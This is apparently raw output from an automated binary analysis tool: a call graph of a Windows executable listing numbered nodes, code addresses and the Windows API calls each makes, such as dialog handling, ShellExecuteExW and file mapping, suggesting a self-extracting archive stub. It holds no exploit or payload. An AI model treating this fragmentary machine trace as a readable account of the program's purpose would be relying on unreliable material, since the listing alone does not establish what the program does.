28068->28063 28072 b11875 28068->28072 28073 b1181f 28068->28073 28069->28056 28071 b11731 28076 b01a66 26 API calls 28071->28076 28120 b10ba6 28 API calls 28072->28120 28118 b10c41 28 API calls 28073->28118 28074->28075 28080 b0769f 45 API calls 28074->28080 28075->28066 28076->28075 28078 b11883 28081 b025a4 26 API calls 28078->28081 28083 b11789 28080->28083 28084 b1188c 28081->28084 28082 b11838 28119 b01188 28 API calls 28082->28119 28116 b10bf3 28 API calls _wcslen 28083->28116 28088 b01a66 26 API calls 28084->28088 28087 b1179e 28117 b0aef3 28 API calls 28087->28117 28091 b11894 28088->28091 28089 b11848 28095 b025a4 26 API calls 28089->28095 28121 b10ddb 28 API calls 28091->28121 28092 b117b2 28094 b025a4 26 API calls 28092->28094 28096 b117be 28094->28096 28097 b11860 28095->28097 28098 b01a66 26 API calls 28096->28098 28099 b01a66 26 API calls 28097->28099 28101 b117c6 28098->28101 28103 b11868 28099->28103 28100 b0769f 45 API calls 28106 b11870 28100->28106 28105 b01a66 26 API calls 28101->28105 28102 b1189c 28102->28100 28104 b01a66 26 API calls 28103->28104 28104->28106 28107 b117ce 28105->28107 28109 b01a66 26 API calls 28106->28109 28108 b01a66 26 API calls 28107->28108 28108->28075 28109->28063 28110->27921 28111->28065 28113 b025b2 28112->28113 28114 b025ad 28112->28114 28113->28071 28115 b01a66 26 API calls 28114->28115 28115->28113 28116->28087 28117->28092 28118->28082 28119->28089 28120->28078 28121->28102 28122->28075 28129 b1347b 28123->28129 28126 b14346 28126->27933 28127 b1436c LoadStringW 28127->28126 28128 b14383 LoadStringW 28127->28128 28128->28126 28136 b1338e 28129->28136 28132 b134bc 28134 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28132->28134 28135 b134d1 28134->28135 28135->28126 28135->28127 28137 b133c2 28136->28137 28138 b13445 _strncpy 28136->28138 28142 b133e2 28137->28142 28147 b189ed WideCharToMultiByte 28137->28147 28140 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28138->28140 28141 b13474 28140->28141 28141->28132 28146 b134d5 26 API calls 28141->28146 28145 b13413 28142->28145 28148 b142b2 50 API calls __vsnprintf 28142->28148 28149 b2d097 26 API calls 3 library calls 28145->28149 28146->28132 28147->28142 28148->28145 28149->28138 28151 b168e0 __EH_prolog3_GS 28150->28151 28165 b1663b 28151->28165 28156 b16929 28162 b1696e 28156->28162 28178 b16a3d 28156->28178 28181 b07ff0 28 API calls 28156->28181 28158 b1698e 28163 b169d2 28158->28163 28183 b019a9 26 API calls 28158->28183 28159 b25787 5 API calls 28161 b169e8 28159->28161 28161->27820 28162->28158 28182 b07ff0 28 API calls 28162->28182 28163->28159 28166 b166df 28165->28166 28167 b16651 28165->28167 28169 b0adcc 28166->28169 28167->28166 28168 b01b63 28 API calls 28167->28168 28168->28167 28170 b0ae43 28169->28170 28173 b0addd 28169->28173 28185 b01a92 28 API calls std::_Xinvalid_argument 28170->28185 28177 b0ade8 28173->28177 28184 b012d3 28 API calls Concurrency::cancel_current_task 28173->28184 28175 b0ae17 28176 b011b8 28 API calls 28175->28176 28176->28177 28177->28156 28186 b0f68d 28178->28186 28181->28156 28182->28158 28183->28163 28184->28175 28187 b0f6a4 __vswprintf_c_l 28186->28187 28190 b2cee1 28187->28190 28193 b2afa4 28190->28193 28194 b2afe4 28193->28194 28195 b2afcc 28193->28195 28194->28195 28197 b2afec 28194->28197 28210 b301d3 20 API calls __dosmaperr 28195->28210 28212 b2b543 28197->28212 28198 b2afd1 28211 b2ac8e 26 API calls _abort 28198->28211 28203 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28205 b0f6ae 28203->28205 28204 b2b074 28221 b2b8f3 51 API calls 3 library calls 28204->28221 28205->28156 28208 b2afdc 28208->28203 28209 b2b07f 28222 b2b5c6 20 API calls _free 28209->28222 28210->28198 28211->28208 28213 b2b560 28212->28213 28219 b2affc 28212->28219 28213->28219 28223 b30005 GetLastError 28213->28223 28215 b2b581 28244 b30706 38 API calls __fassign 28215->28244 28217 b2b59a 28245 b30733 38 API calls __fassign 28217->28245 28220 b2b50e 20 API calls 2 library calls 28219->28220 28220->28204 28221->28209 28222->28208 28224 b30027 28223->28224 28225 b3001b 28223->28225 28227 b31de6 __dosmaperr 20 API calls 28224->28227 28226 b31b0b __dosmaperr 11 API calls 28225->28226 28228 b30021 28226->28228 28229 b30033 28227->28229 28228->28224 28230 b30070 SetLastError 28228->28230 28231 b3003b 28229->28231 28232 b31b61 __dosmaperr 11 API calls 28229->28232 28230->28215 28233 b303d4 _free 20 API calls 28231->28233 28234 b30050 28232->28234 28235 b30041 28233->28235 28234->28231 28236 b30057 28234->28236 28237 b3007c SetLastError 28235->28237 28238 b2fe70 __dosmaperr 20 API calls 28236->28238 28240 b2fc3e _abort 35 API calls 28237->28240 28239 b30062 28238->28239 28241 b303d4 _free 20 API calls 28239->28241 28242 b30088 28240->28242 28243 b30069 28241->28243 28243->28230 28243->28237 28244->28217 28245->28219 28246->27826 28247->27829 28249 b2eb9d _abort 28248->28249 28250 b2ebb6 28249->28250 28251 b2eba4 28249->28251 28272 b318e1 EnterCriticalSection 28250->28272 28284 b2eceb GetModuleHandleW 28251->28284 28254 b2eba9 28254->28250 28285 b2ed2f GetModuleHandleExW 28254->28285 28255 b2ec5b 28273 b2ec9b 28255->28273 28259 b2ec32 28264 b2ec4a 28259->28264 28269 b2f951 _abort 5 API calls 28259->28269 28261 b2ebbd 28261->28255 28261->28259 28293 b2f6a0 20 API calls _abort 28261->28293 28262 b2eca4 28294 b38fc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28262->28294 28263 b2ec78 28276 b2ecaa 28263->28276 28265 b2f951 _abort 5 API calls 28264->28265 28265->28255 28269->28264 28272->28261 28295 b31931 LeaveCriticalSection 28273->28295 28275 b2ec74 28275->28262 28275->28263 28296 b31d26 28276->28296 28279 b2ecd8 28282 b2ed2f _abort 8 API calls 28279->28282 28280 b2ecb8 GetPEB 28280->28279 28281 b2ecc8 GetCurrentProcess TerminateProcess 28280->28281 28281->28279 28283 b2ece0 ExitProcess 28282->28283 28284->28254 28286 b2ed59 GetProcAddress 28285->28286 28287 b2ed7c 28285->28287 28288 b2ed6e 28286->28288 28289 b2ed82 FreeLibrary 28287->28289 28290 b2ed8b 28287->28290 28288->28287 28289->28290 28291 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28290->28291 28292 b2ebb5 28291->28292 28292->28250 28293->28259 28295->28275 28297 b31d41 28296->28297 28298 b31d4b 28296->28298 28301 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28297->28301 28303 b31948 5 API calls __dosmaperr 28298->28303 28300 b31d62 28300->28297 28302 b2ecb4 28301->28302 28302->28279 28302->28280 28303->28300 28304 b22813 28305 b07673 28 API calls 28304->28305 28312 b22832 _wcslen 28305->28312 28306 b22af7 28368 b058cb 45 API calls 28306->28368 28307 b07673 28 API calls 28308 b22aec 28307->28308 28326 b238a0 28308->28326 28312->28306 28313 b0120c 28 API calls 28312->28313 28317 b22a9a 28312->28317 28314 b228fe 28313->28314 28364 b1645a 28 API calls 28314->28364 28316 b22a01 28319 b22a39 28316->28319 28366 b019a9 26 API calls 28316->28366 28317->28306 28317->28307 28319->28317 28367 b019a9 26 API calls 28319->28367 28321 b014a7 28 API calls 28324 b2292f 28321->28324 28322 b0adaa CompareStringW 28322->28324 28323 b01a66 26 API calls 28323->28324 28324->28316 28324->28321 28324->28322 28324->28323 28365 b1645a 28 API calls 28324->28365 28331 b238ac __cftof __EH_prolog3_GS 28326->28331 28327 b01a66 26 API calls 28328 b23bcf 28327->28328 28329 b25787 5 API calls 28328->28329 28330 b23bd4 28329->28330 28330->28306 28334 b23a1e 28331->28334 28354 b23ba8 28331->28354 28378 b18da4 CompareStringW 28331->28378 28333 b014a7 28 API calls 28335 b23a34 28333->28335 28334->28333 28369 b0ed0d 28335->28369 28338 b01a66 26 API calls 28339 b23a4b 28338->28339 28340 b23a9d ShellExecuteExW 28339->28340 28343 b014a7 28 API calls 28339->28343 28341 b23ab2 28340->28341 28342 b23b7c 28340->28342 28346 b23ae5 WaitForInputIdle 28341->28346 28347 b23ace IsWindowVisible 28341->28347 28350 b23b30 CloseHandle 28341->28350 28342->28354 28381 b019a9 26 API calls 28342->28381 28344 b23a71 28343->28344 28379 b10e49 51 API calls 2 library calls 28344->28379 28372 b23fcf WaitForSingleObject 28346->28372 28347->28346 28351 b23ad9 ShowWindow 28347->28351 28348 b23a82 28353 b01a66 26 API calls 28348->28353 28355 b23b48 28350->28355 28356 b23b3d 28350->28356 28351->28346 28358 b23a8e 28353->28358 28354->28327 28355->28342 28362 b23b73 ShowWindow 28355->28362 28380 b18da4 CompareStringW 28356->28380 28357 b23afb 28357->28350 28360 b23b08 GetExitCodeProcess 28357->28360 28358->28340 28360->28350 28361 b23b19 28360->28361 28361->28350 28362->28342 28364->28324 28365->28324 28366->28319 28367->28317 28370 b0ed1f 49 API calls 28369->28370 28371 b0ed16 28370->28371 28371->28338 28373 b2402f 28372->28373 28374 b23fea 28372->28374 28373->28357 28375 b23fed PeekMessageW 28374->28375 28376 b24020 WaitForSingleObject 28375->28376 28377 b23fff GetMessageW TranslateMessage DispatchMessageW 28375->28377 28376->28373 28376->28375 28377->28376 28378->28334 28379->28348 28380->28355 28381->28354 28382 b0e3d5 28383 b0e3df 28382->28383 28386 b0e551 SetFilePointer 28383->28386 28387 b0e403 28383->28387 28384 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28385 b0e481 28384->28385 28386->28387 28388 b0e56e GetLastError 28386->28388 28387->28384 28388->28387 28389 b24cda 28390 b24c88 28389->28390 28392 b24fce 28390->28392 28418 b24d2c 28392->28418 28394 b24fde 28395 b2503b 28394->28395 28396 b2505f 28394->28396 28397 b24f6c DloadReleaseSectionWriteAccess 8 API calls 28395->28397 28399 b250d7 LoadLibraryExA 28396->28399 28401 b25138 28396->28401 28402 b2514a 28396->28402 28414 b25206 28396->28414 28398 b25046 RaiseException 28397->28398 28412 b25234 28398->28412 28400 b250ea GetLastError 28399->28400 28399->28401 28403 b25113 28400->28403 28404 b250fd 28400->28404 28401->28402 28406 b25143 FreeLibrary 28401->28406 28405 b251a8 GetProcAddress 28402->28405 28402->28414 28407 b24f6c DloadReleaseSectionWriteAccess 8 API calls 28403->28407 28404->28401 28404->28403 28408 b251b8 GetLastError 28405->28408 28405->28414 28406->28402 28409 b2511e RaiseException 28407->28409 28410 b251cb 28408->28410 28409->28412 28413 b24f6c DloadReleaseSectionWriteAccess 8 API calls 28410->28413 28410->28414 28412->28390 28415 b251ec RaiseException 28413->28415 28429 b24f6c 28414->28429 28416 b24d2c ___delayLoadHelper2@8 8 API calls 28415->28416 28417 b25203 28416->28417 28417->28414 28419 b24d38 28418->28419 28420 b24d5e 28418->28420 28437 b24dd5 28419->28437 28420->28394 28422 b24d3d 28423 b24d59 28422->28423 28442 b24efe 28422->28442 28447 b24d5f GetModuleHandleW GetProcAddress GetProcAddress 28423->28447 28426 b24fa7 28427 b24fc3 28426->28427 28428 b24fbf RtlReleaseSRWLockExclusive 28426->28428 28427->28394 28428->28394 28430 b24fa0 28429->28430 28431 b24f7e 28429->28431 28430->28412 28432 b24dd5 DloadReleaseSectionWriteAccess 4 API calls 28431->28432 28433 b24f83 28432->28433 28434 b24f9b 28433->28434 28435 b24efe DloadProtectSection 3 API calls 28433->28435 28450 b24fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 28434->28450 28435->28434 28448 b24d5f GetModuleHandleW GetProcAddress GetProcAddress 28437->28448 28439 b24dda 28440 b24df2 RtlAcquireSRWLockExclusive 28439->28440 28441 b24df6 28439->28441 28440->28422 28441->28422 28445 b24f13 DloadProtectSection 28442->28445 28443 b24f19 28443->28423 28444 b24f4e VirtualProtect 28444->28443 28445->28443 28445->28444 28449 b24e14 VirtualQuery GetSystemInfo 28445->28449 28447->28426 28448->28439 28449->28444 28450->28430 28451 b2437d 28452 b24389 __EH_prolog3_GS 28451->28452 28453 b14318 53 API calls 28452->28453 28454 b243c6 28453->28454 28455 b16a25 53 API calls 28454->28455 28456 b243d0 28455->28456 28457 b025a4 26 API calls 28456->28457 28458 b243dc 28457->28458 28459 b01a66 26 API calls 28458->28459 28460 b243e4 28459->28460 28469 b01de7 28460->28469 28462 b243f5 28472 b20678 PeekMessageW 28462->28472 28465 b25787 5 API calls 28466 b24446 28465->28466 28468 b24430 28468->28465 28470 b01df1 28469->28470 28471 b01df3 SetDlgItemTextW 28469->28471 28470->28471 28471->28462 28473 b20693 GetMessageW 28472->28473 28474 b206cc 28472->28474 28475 b206b8 TranslateMessage DispatchMessageW 28473->28475 28476 b206a9 IsDialogMessageW 28473->28476 28474->28468 28477 b019a9 26 API calls 28474->28477 28475->28474 28476->28474 28476->28475 28477->28468 28481 b25680 28482 b25696 _com_error::_com_error 28481->28482 28483 b2734a _com_raise_error RaiseException 28482->28483 28484 b256a4 28483->28484 28485 b24fce ___delayLoadHelper2@8 17 API calls 28484->28485 28486 b256bc 28485->28486 28487 b20900 28488 b2090f __EH_prolog3_catch_GS 28487->28488 28733 b01e44 28488->28733 28491 b20940 28495 b20a20 28491->28495 28496 b20951 28491->28496 28544 b2095f 28491->28544 28492 b2125b 28839 b23796 28492->28839 28503 b20ab0 28495->28503 28508 b20a36 28495->28508 28501 b2095a 28496->28501 28502 b209fc 28496->28502 28499 b2128a 28504 b212a3 GetDlgItem SendMessageW 28499->28504 28505 b21293 SendDlgItemMessageW 28499->28505 28500 b2127b SendMessageW 28500->28499 28510 b14318 53 API calls 28501->28510 28501->28544 28507 b20a15 EndDialog 28502->28507 28502->28544 28743 b01ce2 28503->28743 28509 b11309 30 API calls 28504->28509 28505->28504 28507->28544 28512 b14318 53 API calls 28508->28512 28513 b212e3 GetDlgItem 28509->28513 28514 b2098d 28510->28514 28515 b20a53 SetDlgItemTextW 28512->28515 28517 b21302 28513->28517 28886 b01900 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28514->28886 28516 b20a5f 28515->28516 28526 b20a68 GetMessageW 28516->28526 28516->28544 28858 b01e05 28517->28858 28519 b20b01 GetDlgItem 28521 b20b15 SendMessageW SendMessageW 28519->28521 28522 b20b38 SetFocus 28519->28522 28520 b20af5 28533 b2113a 28520->28533 28643 b20acb EndDialog 28520->28643 28521->28522 28527 b20b48 28522->28527 28528 b20b6f 28522->28528 28524 b20994 28530 b209a4 28524->28530 28537 b01de7 SetDlgItemTextW 28524->28537 28532 b20a7f IsDialogMessageW 28526->28532 28526->28544 28534 b14318 53 API calls 28527->28534 28536 b07673 28 API calls 28528->28536 28529 b2130c 28861 b1f2ce GetClassNameW 28529->28861 28530->28544 28887 b019a9 26 API calls 28530->28887 28531 b20ae4 28541 b01a66 26 API calls 28531->28541 28532->28516 28538 b20a8e TranslateMessage DispatchMessageW 28532->28538 28539 b14318 53 API calls 28533->28539 28540 b20b52 28534->28540 28543 b20b7b 28536->28543 28537->28530 28538->28516 28545 b2114b SetDlgItemTextW 28539->28545 28546 b014a7 28 API calls 28540->28546 28541->28544 28905 b234eb 28 API calls __EH_prolog3_GS 28543->28905 28888 b25796 28544->28888 28550 b21160 28545->28550 28551 b20b5b 28546->28551 28557 b14318 53 API calls 28550->28557 28891 b23572 28551->28891 28553 b20b88 28556 b14318 53 API calls 28553->28556 28555 b21346 28561 b21377 28555->28561 28564 b14318 53 API calls 28555->28564 28560 b20b9f 28556->28560 28562 b2117e 28557->28562 28558 b20b6a 28565 b01a66 26 API calls 28558->28565 28559 b21d4f 48 API calls 28559->28555 28563 b16a25 53 API calls 28560->28563 28570 b21d4f 48 API calls 28561->28570 28670 b21490 28561->28670 28566 b014a7 28 API calls 28562->28566 28568 b20ba9 28563->28568 28569 b21359 SetDlgItemTextW 28564->28569 28571 b20bce 28565->28571 28572 b21187 28566->28572 28567 b21595 28578 b215a0 EnableWindow 28567->28578 28579 b215ad 28567->28579 28573 b23572 21 API calls 28568->28573 28574 b14318 53 API calls 28569->28574 28575 b2138d 28570->28575 28576 b20be0 28571->28576 28906 b23d64 26 API calls __EH_prolog3_GS 28571->28906 28577 b211f5 28572->28577 28590 b014a7 28 API calls 28572->28590 28580 b20bbb 28573->28580 28581 b2136d SetDlgItemTextW 28574->28581 28598 b213ad 28575->28598 28618 b213ce 28575->28618 28584 b20c07 28576->28584 28592 b0ed0d 49 API calls 28576->28592 28583 b14318 53 API calls 28577->28583 28578->28579 28586 b215c8 28579->28586 28923 b01cc4 GetDlgItem KiUserCallbackDispatcher 28579->28923 28588 b01a66 26 API calls 28580->28588 28581->28561 28589 b211ff 28583->28589 28757 b0eaf3 28584->28757 28585 b2147c 28593 b21d4f 48 API calls 28585->28593 28597 b215f0 28586->28597 28609 b215e8 SendMessageW 28586->28609 28588->28558 28599 b014a7 28 API calls 28589->28599 28591 b211a6 28590->28591 28603 b14318 53 API calls 28591->28603 28604 b20bfd 28592->28604 28593->28670 28595 b21560 28922 b1e265 34 API calls __EH_prolog3_GS 28595->28922 28597->28531 28610 b14318 53 API calls 28597->28610 28920 b1e265 34 API calls __EH_prolog3_GS 28598->28920 28600 b2120b 28599->28600 28614 b014a7 28 API calls 28600->28614 28601 b215bf 28924 b01cc4 GetDlgItem KiUserCallbackDispatcher 28601->28924 28629 b211b6 28603->28629 28604->28584 28611 b20c01 28604->28611 28605 b20c20 GetLastError 28606 b20c2b 28605->28606 28767 b12226 28606->28767 28609->28597 28616 b21609 SetDlgItemTextW 28610->28616 28907 b1fa79 25 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28611->28907 28622 b21224 28614->28622 28615 b014a7 28 API calls 28615->28670 28616->28531 28618->28585 28623 b21d4f 48 API calls 28618->28623 28619 b20c40 28624 b20c5d 28619->28624 28625 b20c4c GetLastError 28619->28625 28620 b21587 28621 b01a66 26 API calls 28620->28621 28626 b21593 28621->28626 28636 b01a66 26 API calls 28622->28636 28630 b21405 28623->28630 28627 b20cfd 28624->28627 28631 b20d0f 28624->28631 28632 b20c79 GetTickCount 28624->28632 28625->28624 28626->28567 28627->28631 28633 b21046 28627->28633 28628 b14318 53 API calls 28628->28670 28646 b01a66 26 API calls 28629->28646 28630->28585 28634 b2140e DialogBoxParamW 28630->28634 28638 b20f94 28631->28638 28645 b113f9 29 API calls 28631->28645 28770 b0325c 28632->28770 28802 b01e1f GetDlgItem ShowWindow 28633->28802 28634->28585 28639 b2142c EndDialog 28634->28639 28641 b21243 28636->28641 28638->28643 28918 b09733 28 API calls _wcslen 28638->28918 28639->28544 28647 b21448 28639->28647 28649 b01a66 26 API calls 28641->28649 28642 b2105b 28803 b01e1f GetDlgItem ShowWindow 28642->28803 28643->28531 28652 b20d39 28645->28652 28653 b211e9 28646->28653 28647->28544 28921 b019a9 26 API calls 28647->28921 28655 b2124e 28649->28655 28651 b20fae 28666 b14318 53 API calls 28651->28666 28908 b1505a 114 API calls 28652->28908 28658 b01a66 26 API calls 28653->28658 28654 b20c9f 28660 b01a66 26 API calls 28654->28660 28661 b01a66 26 API calls 28655->28661 28656 b21064 28662 b14318 53 API calls 28656->28662 28658->28577 28664 b20cab 28660->28664 28661->28531 28665 b2106e SetDlgItemTextW 28662->28665 28663 b20d51 28671 b16a25 53 API calls 28663->28671 28780 b0de9a 28664->28780 28804 b01e1f GetDlgItem ShowWindow 28665->28804 28669 b20fd4 28666->28669 28667 b01a66 26 API calls 28667->28670 28678 b01a66 26 API calls 28669->28678 28670->28567 28670->28595 28670->28615 28670->28628 28670->28667 28684 b20d80 GetCommandLineW 28671->28684 28672 b21082 SetDlgItemTextW GetDlgItem 28674 b210b7 28672->28674 28675 b2109f GetWindowLongW SetWindowLongW 28672->28675 28805 b21d4f 28674->28805 28675->28674 28682 b20fea 28678->28682 28679 b20ce0 28793 b0ddc7 28679->28793 28680 b20cd5 GetLastError 28680->28679 28687 b01a66 26 API calls 28682->28687 28696 b20e05 _wcslen 28684->28696 28686 b21d4f 48 API calls 28689 b210ce 28686->28689 28690 b20ff6 28687->28690 28825 b23c78 28689->28825 28699 b14318 53 API calls 28690->28699 28692 b01a66 26 API calls 28692->28627 28694 b20e23 28910 b20405 5 API calls 2 library calls 28694->28910 28909 b20405 5 API calls 2 library calls 28696->28909 28698 b21d4f 48 API calls 28709 b210ef 28698->28709 28701 b2100c 28699->28701 28700 b20e2f 28911 b20405 5 API calls 2 library calls 28700->28911 28704 b014a7 28 API calls 28701->28704 28703 b21110 28919 b01cc4 GetDlgItem KiUserCallbackDispatcher 28703->28919 28705 b21015 28704->28705 28712 b01a66 26 API calls 28705->28712 28706 b20e3b 28912 b15109 114 API calls 28706->28912 28709->28703 28711 b21d4f 48 API calls 28709->28711 28710 b20e4e 28913 b23e53 28 API calls __EH_prolog3 28710->28913 28711->28703 28714 b21031 28712->28714 28716 b01a66 26 API calls 28714->28716 28715 b20e6b CreateFileMappingW 28717 b20ed5 ShellExecuteExW 28715->28717 28718 b20e9d MapViewOfFile 28715->28718 28716->28643 28720 b20ef3 28717->28720 28719 b20ed2 __InternalCxxFrameHandler 28718->28719 28719->28717 28721 b20f00 WaitForInputIdle 28720->28721 28722 b20f3d 28720->28722 28723 b20f1e 28721->28723 28725 b20f73 28722->28725 28726 b20f60 UnmapViewOfFile CloseHandle 28722->28726 28723->28722 28724 b20f23 Sleep 28723->28724 28724->28722 28724->28723 28914 b02e8b 28725->28914 28726->28725 28729 b01a66 26 API calls 28730 b20f83 28729->28730 28731 b01a66 26 API calls 28730->28731 28732 b20f8e 28731->28732 28732->28638 28734 b01ea6 28733->28734 28735 b01e4d 28733->28735 28926 b13e83 GetWindowLongW SetWindowLongW 28734->28926 28737 b01eb3 28735->28737 28925 b13eaa 64 API calls 3 library calls 28735->28925 28737->28491 28737->28492 28737->28544 28739 b01e6f 28739->28737 28740 b01e82 GetDlgItem 28739->28740 28740->28737 28741 b01e92 28740->28741 28741->28737 28742 b01e98 SetWindowTextW 28741->28742 28742->28737 28927 b257d8 28743->28927 28745 b01cee GetDlgItem 28746 b01d0b 28745->28746 28747 b01d1d 28745->28747 28748 b014a7 28 API calls 28746->28748 28928 b01d64 28747->28928 28750 b01d18 28748->28750 28751 b01d4d 28750->28751 28752 b01a66 26 API calls 28750->28752 28753 b01d5a 28751->28753 28754 b01a66 26 API calls 28751->28754 28752->28751 28755 b25787 5 API calls 28753->28755 28754->28753 28756 b01d61 28755->28756 28756->28519 28756->28520 28756->28643 28763 b0eaff __EH_prolog3_GS 28757->28763 28758 b25787 5 API calls 28759 b0ebb6 28758->28759 28759->28605 28759->28606 28760 b0eb84 28761 b0efef 54 API calls 28760->28761 28764 b0eb09 28760->28764 28761->28764 28762 b0769f 45 API calls 28762->28763 28763->28760 28763->28762 28763->28764 28766 b01a66 26 API calls 28763->28766 28941 b0efef 28763->28941 28764->28758 28766->28763 28768 b12230 28767->28768 28769 b12232 SetCurrentDirectoryW 28767->28769 28768->28769 28769->28619 28771 b03280 28770->28771 28975 b02f0f 28771->28975 28774 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28775 b0329d 28774->28775 28776 b02f45 28775->28776 28777 b02f55 _wcslen 28776->28777 28979 b05962 28777->28979 28779 b02f63 28779->28654 28782 b0dea6 __EH_prolog3_GS 28780->28782 28781 b0def4 28784 b1169a 47 API calls 28781->28784 28792 b0df9e 28781->28792 28782->28781 28783 b0df09 CreateFileW 28782->28783 28783->28781 28786 b0df49 28784->28786 28785 b25787 5 API calls 28788 b0dfdf 28785->28788 28787 b0df6e 28786->28787 28789 b0df56 28786->28789 28790 b0df59 CreateFileW 28786->28790 28787->28792 28988 b019a9 26 API calls 28787->28988 28788->28679 28788->28680 28789->28790 28790->28787 28792->28785 28794 b0ddf8 28793->28794 28801 b0de09 28793->28801 28796 b0de04 28794->28796 28797 b0de0b 28794->28797 28794->28801 28795 b01a66 26 API calls 28798 b0de18 28795->28798 28989 b0dfe2 28796->28989 28994 b0de50 28797->28994 28798->28692 28801->28795 28802->28642 28803->28656 28804->28672 28819 b21d5e __EH_prolog3_GS 28805->28819 28807 b2349a 28808 b01a66 26 API calls 28807->28808 28809 b234a5 28808->28809 28810 b25787 5 API calls 28809->28810 28811 b210c5 28810->28811 28811->28686 28812 b1645a 28 API calls 28812->28819 28813 b0769f 45 API calls 28813->28819 28814 b025a4 26 API calls 28814->28819 28815 b014a7 28 API calls 28815->28819 28819->28807 28819->28812 28819->28813 28819->28814 28819->28815 28820 b234ad 28819->28820 28823 b01a66 26 API calls 28819->28823 29015 b2030a 28819->29015 29019 b162cd 30 API calls 2 library calls 28819->29019 29020 b1f5b2 28 API calls 28819->29020 29021 b0adaa CompareStringW 28819->29021 29022 b244c0 26 API calls 28819->29022 29023 b058cb 45 API calls 28820->29023 28823->28819 28826 b23c87 __EH_prolog3_catch_GS _wcslen 28825->28826 29029 b16a89 28826->29029 28828 b23cba 29033 b07903 28828->29033 28837 b25796 5 API calls 28838 b210e0 28837->28838 28838->28698 29876 b1eaa6 28839->29876 28842 b237bf GetWindow 28843 b237d8 28842->28843 28846 b23885 28842->28846 28843->28846 28847 b237e5 GetClassNameW 28843->28847 28849 b23809 GetWindowLongW 28843->28849 28850 b2386d GetWindow 28843->28850 28844 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28845 b21266 28844->28845 28845->28499 28845->28500 28846->28844 29881 b18da4 CompareStringW 28847->29881 28849->28850 28851 b23819 SendMessageW 28849->28851 28850->28843 28850->28846 28851->28850 28852 b2382f GetObjectW 28851->28852 29882 b1eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28852->29882 28854 b23846 29883 b1eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28854->29883 29884 b1ef21 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28854->29884 28857 b23857 SendMessageW DeleteObject 28857->28850 28859 b01e11 SetWindowTextW 28858->28859 28860 b01e0f 28858->28860 28859->28529 28860->28859 28862 b1f2f9 28861->28862 28869 b1f31e 28861->28869 29887 b18da4 CompareStringW 28862->29887 28863 b1f323 SHAutoComplete 28864 b1f32c 28863->28864 28866 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28864->28866 28870 b1f337 28866->28870 28867 b1f30c 28868 b1f310 FindWindowExW 28867->28868 28867->28869 28868->28869 28869->28863 28869->28864 28871 b1fdd1 28870->28871 28872 b1fded 28871->28872 28873 b020b0 30 API calls 28872->28873 28874 b1fe27 28873->28874 29888 b02dbb 28874->29888 28877 b1fe43 28879 b0232c 123 API calls 28877->28879 28878 b1fe4c 29895 b0278b 28878->29895 28883 b1fe48 28879->28883 28882 b0232c 123 API calls 28882->28883 28884 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28883->28884 28885 b1fe77 28884->28885 28885->28555 28885->28559 28886->28524 28887->28544 28889 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28888->28889 28890 b257a0 28889->28890 28890->28890 28892 b20678 5 API calls 28891->28892 28893 b2358d GetDlgItem 28892->28893 28894 b235e4 SendMessageW SendMessageW 28893->28894 28895 b235ac 28893->28895 28896 b23643 SendMessageW 28894->28896 28897 b23624 28894->28897 28898 b235b7 ShowWindow SendMessageW SendMessageW 28895->28898 28899 b2365b 28896->28899 28900 b2365d SendMessageW SendMessageW 28896->28900 28897->28896 28898->28894 28899->28900 28901 b236a2 SendMessageW 28900->28901 28902 b2367f SendMessageW 28900->28902 28903 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28901->28903 28902->28901 28904 b236c0 28903->28904 28904->28558 28905->28553 28906->28576 28907->28584 28908->28663 28909->28694 28910->28700 28911->28706 28912->28710 28913->28715 28915 b02e93 28914->28915 28916 b02ea0 28914->28916 28917 b012a7 26 API calls 28915->28917 28916->28729 28917->28916 28918->28651 28919->28520 28920->28618 28921->28585 28922->28620 28923->28601 28924->28586 28925->28739 28926->28737 28927->28745 28939 b257d8 28928->28939 28930 b01d70 GetWindowTextLengthW 28940 b01bbd 28 API calls 28930->28940 28932 b01dab GetWindowTextW 28933 b014a7 28 API calls 28932->28933 28934 b01dca 28933->28934 28935 b01ddd 28934->28935 28936 b012a7 26 API calls 28934->28936 28937 b25787 5 API calls 28935->28937 28936->28935 28938 b01de4 28937->28938 28938->28750 28939->28930 28940->28932 28943 b0effb __EH_prolog3_GS 28941->28943 28942 b0f02f 28945 b0ed0d 49 API calls 28942->28945 28943->28942 28944 b0f01b CreateDirectoryW 28943->28944 28944->28942 28946 b0f0d0 28944->28946 28949 b0f03b 28945->28949 28947 b0f0df 28946->28947 28960 b0f58b 28946->28960 28953 b25787 5 API calls 28947->28953 28948 b0f0e3 GetLastError 28948->28947 28949->28948 28951 b1169a 47 API calls 28949->28951 28952 b0f063 28951->28952 28954 b0f07d 28952->28954 28956 b0f070 28952->28956 28957 b0f073 CreateDirectoryW 28952->28957 28955 b0f100 28953->28955 28959 b0f0ad 28954->28959 28973 b019a9 26 API calls 28954->28973 28955->28763 28956->28957 28957->28954 28959->28946 28959->28948 28961 b0f597 __EH_prolog3_GS 28960->28961 28962 b0f5a4 SetFileAttributesW 28961->28962 28963 b0f5b7 28962->28963 28972 b0f622 